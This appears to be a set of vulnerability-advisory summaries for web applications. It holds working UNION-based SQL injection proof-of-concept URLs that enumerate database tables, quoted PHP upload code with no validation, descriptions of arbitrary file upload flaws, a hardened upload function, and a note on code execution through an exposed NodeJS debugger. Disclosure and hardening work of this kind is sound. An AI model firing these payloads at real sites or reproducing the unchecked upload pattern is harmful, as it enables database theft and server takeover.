The vulnerability allows student members to inject SQL commands. Proof of Concept: http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+- etc.
The vulnerability allows student members to inject SQL commands. Proof of Concept: http://localhost/[PATH]/?church-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+- etc.
The vulnerability allows users to upload arbitrary files. Vulnerable Source:

    if(isset($id)){
        $user_d=$this->request->data;
        $this->row_update=$this->table_user->get($id);
        $this->set('emp_update_row',$this->row_update);
        if($this->request->is(['post','put'])){
            $get_output=$this->check_update_email($this->row_update,$this->request->data('email'));
            if($get_output == true){
                if(isset($_FILES['image']['name']) && !empty($_FILES['image']['name'])){
                    // The client-supplied file name and contents are written into the image
                    // directory without any check on type, extension or name.
                    move_uploaded_file($_FILES['image']['tmp_name'],$this->user_image.$_FILES['image']['name']);
                    $this->store_image=$_FILES['image']['name'];
                }else{
                    $this->store_image=$this->request->data('old_image');
                }
                // ... remainder of the update handler not included in the advisory
            }
        }
    }
The vulnerability allows student users to inject SQL commands. Proof of Concept: http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -23102%20UNION%20SELECT%201,2,3,4,5,(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE()),7,8--%20- etc.
The vulnerability allows users to upload arbitrary files. The application does not validate the type or extension of the uploaded file, so malicious files can be uploaded and arbitrary code executed on the server.
The vulnerability allows users to upload arbitrary files. It is located in the 'updateProfile' function, where file upload validation is missing. An attacker can upload an arbitrary file and execute it from the application path.
The vulnerability allows Job Seeker and Employer users to upload arbitrary files. The vulnerable source code is located in the profileChange and coverChange functions of the User controller, which do not validate the file type before writing the file to the uploads directory.
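A hardened counterpart to the profile-image upload branch quoted in the vulnerable source above, written here as an added example rather than the project's own code. The function name store_profile_image, the 2 MiB size cap and the image allowlist are assumptions; the controller fields ($this->user_image, $this->store_image, $this->request->data) are taken from the quoted snippet.

```php
<?php
// Added example (not the project's code): replacement for the upload branch in
// the vulnerable updateProfile handler. Returns the stored name or null if rejected.

function store_profile_image(array $file, string $targetDir): ?string
{
    // Only accept a file PHP actually received via HTTP upload, with no errors.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    if ($file['size'] > 2 * 1024 * 1024) {            // assumed 2 MiB cap for an avatar
        return null;
    }
    // Decide the type from file content, never from the client-supplied name or MIME.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // Require the image to actually parse; a script with a forged header fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // Never reuse the client-supplied name: random name, extension fixed by detected type.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($targetDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);                                // stored file is data, not executable
    return $name;
}

// Usage in the controller branch from the advisory (surrounding code is hypothetical):
if (isset($_FILES['image']['name']) && $_FILES['image']['name'] !== '') {
    $stored = store_profile_image($_FILES['image'], $this->user_image);
    if ($stored === null) {
        throw new RuntimeException('Rejected upload: not a valid profile image');
    }
    $this->store_image = $stored;
} else {
    $this->store_image = $this->request->data('old_image');
}
```

Pair this with a web-server rule that refuses to execute scripts under the upload directory, since content checks alone do not stop image/PHP polyglot files; the random name with a fixed extension is what removes the attacker's control over how the file is served.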
This module uses the "evaluate" request type of the NodeJS V8 debugger protocol (version 1) to evaluate arbitrary JavaScript and call out to other system commands. The port (default 5858) is not exposed non-locally in default configurations, but may be exposed either intentionally or through misconfiguration.